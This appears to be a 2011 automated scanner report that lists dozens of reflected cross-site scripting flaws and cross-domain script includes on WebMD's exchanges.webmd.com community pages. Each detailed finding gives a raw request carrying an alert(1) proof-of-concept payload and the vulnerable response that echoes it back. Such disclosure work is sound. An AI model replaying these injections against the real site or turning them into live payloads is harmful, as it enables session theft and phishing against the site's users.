XSS, Cross Site Scripting, CAPEC-86, exchanges.webmd.com

CAPEC-86: Embedding Script (XSS ) in HTTP Headers | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Sat Feb 12 08:35:38 CST 2011.


The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. http://exchanges.webmd.com/default.htm [REST URL parameter 1]

1.2. http://exchanges.webmd.com/default.htm [name of an arbitrarily supplied request parameter]

1.3. http://exchanges.webmd.com/default.htm [name of an arbitrarily supplied request parameter]

1.4. http://exchanges.webmd.com/pet-health-exchange [REST URL parameter 1]

1.5. http://exchanges.webmd.com/pet-health-exchange [name of an arbitrarily supplied request parameter]

1.6. http://exchanges.webmd.com/pet-health-exchange [name of an arbitrarily supplied request parameter]

1.7. http://exchanges.webmd.com/skin-and-beauty-exchange [REST URL parameter 1]

1.8. http://exchanges.webmd.com/skin-and-beauty-exchange [name of an arbitrarily supplied request parameter]

1.9. http://exchanges.webmd.com/skin-and-beauty-exchange [name of an arbitrarily supplied request parameter]

1.10. http://exchanges.webmd.com/webmd-exchanges/blogs [REST URL parameter 1]

1.11. http://exchanges.webmd.com/webmd-exchanges/blogs [REST URL parameter 2]

1.12. http://exchanges.webmd.com/webmd-exchanges/blogs [name of an arbitrarily supplied request parameter]

1.13. http://exchanges.webmd.com/webmd-exchanges/blogs [name of an arbitrarily supplied request parameter]

1.14. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [REST URL parameter 1]

1.15. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [REST URL parameter 2]

1.16. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [name of an arbitrarily supplied request parameter]

1.17. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [name of an arbitrarily supplied request parameter]

1.18. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [REST URL parameter 1]

1.19. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [REST URL parameter 2]

1.20. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [name of an arbitrarily supplied request parameter]

1.21. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [name of an arbitrarily supplied request parameter]

1.22. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [REST URL parameter 1]

1.23. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [REST URL parameter 2]

1.24. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [name of an arbitrarily supplied request parameter]

1.25. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [name of an arbitrarily supplied request parameter]

1.26. http://exchanges.webmd.com/webmd-exchanges/health-experts [REST URL parameter 1]

1.27. http://exchanges.webmd.com/webmd-exchanges/health-experts [REST URL parameter 2]

1.28. http://exchanges.webmd.com/webmd-exchanges/health-experts [name of an arbitrarily supplied request parameter]

1.29. http://exchanges.webmd.com/webmd-exchanges/health-experts [name of an arbitrarily supplied request parameter]

1.30. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [REST URL parameter 1]

1.31. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [REST URL parameter 2]

1.32. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [name of an arbitrarily supplied request parameter]

1.33. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [name of an arbitrarily supplied request parameter]

1.34. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [REST URL parameter 1]

1.35. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [REST URL parameter 2]

1.36. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [name of an arbitrarily supplied request parameter]

1.37. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [name of an arbitrarily supplied request parameter]

1.38. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [REST URL parameter 1]

1.39. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [REST URL parameter 2]

1.40. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [name of an arbitrarily supplied request parameter]

1.41. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [name of an arbitrarily supplied request parameter]

1.42. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [REST URL parameter 1]

1.43. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [REST URL parameter 2]

1.44. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [name of an arbitrarily supplied request parameter]

1.45. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [name of an arbitrarily supplied request parameter]

1.46. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [REST URL parameter 1]

1.47. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [REST URL parameter 2]

1.48. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [name of an arbitrarily supplied request parameter]

1.49. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [name of an arbitrarily supplied request parameter]

1.50. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [REST URL parameter 1]

1.51. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [REST URL parameter 2]

1.52. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [name of an arbitrarily supplied request parameter]

1.53. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [name of an arbitrarily supplied request parameter]

1.54. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [REST URL parameter 1]

1.55. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [REST URL parameter 2]

1.56. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [name of an arbitrarily supplied request parameter]

1.57. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [name of an arbitrarily supplied request parameter]

2. Cross-domain script include

2.1. http://exchanges.webmd.com/default.htm

2.2. http://exchanges.webmd.com/pet-health-exchange

2.3. http://exchanges.webmd.com/skin-and-beauty-exchange

2.4. http://exchanges.webmd.com/webmd-exchanges/blogs

2.5. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges

2.6. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges

2.7. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges

2.8. http://exchanges.webmd.com/webmd-exchanges/health-experts

2.9. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges

2.10. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges

2.11. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges

2.12. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges

2.13. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges

2.14. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges

2.15. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges

3. Email addresses disclosed



1. Cross-site scripting (reflected)  next
There are 57 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://exchanges.webmd.com/default.htm [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /default.htm

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68316'-alert(1)-'5976a95f57f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /68316'-alert(1)-'5976a95f57f HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59421
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:52 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
//as.webmd.com/html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252f68316'-alert(1)-'5976a95f57f&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.2. http://exchanges.webmd.com/default.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /default.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f41e"-alert(1)-"bfbb0bdf73b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.htm?8f41e"-alert(1)-"bfbb0bdf73b=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 113180
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:44 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/default.htm?8f41e"-alert(1)-"bfbb0bdf73b=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.3. http://exchanges.webmd.com/default.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /default.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 582cd'-alert(1)-'b6607421c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.htm?582cd'-alert(1)-'b6607421c6a=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 113172
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:45 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
rc="http://as.webmd.com/html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=8000&au1=&au2=&uri=%2fdefault.htm%3f582cd'-alert(1)-'b6607421c6a%3d1&artid=091e9c5e803f6d03&inst=0&amp;leaf=">
...[SNIP]...

1.4. http://exchanges.webmd.com/pet-health-exchange [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /pet-health-exchange

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86bb6'-alert(1)-'7f58c8459fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pet-health-exchange86bb6'-alert(1)-'7f58c8459fb HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59478
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:55:21 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fpet-health-exchange86bb6'-alert(1)-'7f58c8459fb&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.5. http://exchanges.webmd.com/pet-health-exchange [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /pet-health-exchange

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef7e1'-alert(1)-'edc35b8508c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pet-health-exchange?ef7e1'-alert(1)-'edc35b8508c=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 288274
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
src="http://as.webmd.com/html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=35&hcent=&scent=&exgid=55&app='+adApp+adAuid+'&pos=101&exg1=1165&sec=&au1=&au2=&uri=%2fpet-health-exchange%3fef7e1'-alert(1)-'edc35b8508c%3d1&artid=091e9c5e80410967&inst=0&amp;leaf=">
...[SNIP]...

1.6. http://exchanges.webmd.com/pet-health-exchange [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /pet-health-exchange

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9923e"-alert(1)-"3876479fafc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pet-health-exchange?9923e"-alert(1)-"3876479fafc=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 288292
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:40 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/pet-health-exchange?9923e"-alert(1)-"3876479fafc=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id="55"; var space_title="Pet Health Community"; var space_name="pet-health-ex
...[SNIP]...

1.7. http://exchanges.webmd.com/skin-and-beauty-exchange [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /skin-and-beauty-exchange

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bfd79'-alert(1)-'9b8ea055f19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /skin-and-beauty-exchangebfd79'-alert(1)-'9b8ea055f19 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59493
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:55:15 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ransactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fskin-and-beauty-exchangebfd79'-alert(1)-'9b8ea055f19&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.8. http://exchanges.webmd.com/skin-and-beauty-exchange [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /skin-and-beauty-exchange

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19778"-alert(1)-"364ae7077e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /skin-and-beauty-exchange?19778"-alert(1)-"364ae7077e0=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 301707
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:27 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/skin-and-beauty-exchange?19778"-alert(1)-"364ae7077e0=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id="59"; var space_title="Skin & Beauty Community"; var space_name="skin-and-b
...[SNIP]...

1.9. http://exchanges.webmd.com/skin-and-beauty-exchange [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /skin-and-beauty-exchange

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 884d3'-alert(1)-'5929a12632 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /skin-and-beauty-exchange?884d3'-alert(1)-'5929a12632=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 301686
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:30 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
http://as.webmd.com/html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=35&hcent=&scent=&exgid=59&app='+adApp+adAuid+'&pos=101&exg1=1011&sec=&au1=&au2=&uri=%2fskin-and-beauty-exchange%3f884d3'-alert(1)-'5929a12632%3d1&artid=091e9c5e80410dd6&inst=0&amp;leaf=">
...[SNIP]...

1.10. http://exchanges.webmd.com/webmd-exchanges/blogs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/blogs

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceb52'-alert(1)-'96eaa884564 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangesceb52'-alert(1)-'96eaa884564/blogs HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59494
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:01 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangesceb52'-alert(1)-'96eaa884564%252fblogs&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.11. http://exchanges.webmd.com/webmd-exchanges/blogs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/blogs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb853'-alert(1)-'3c9824a60b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/blogseb853'-alert(1)-'3c9824a60b3 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59494
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ansactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fblogseb853'-alert(1)-'3c9824a60b3&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

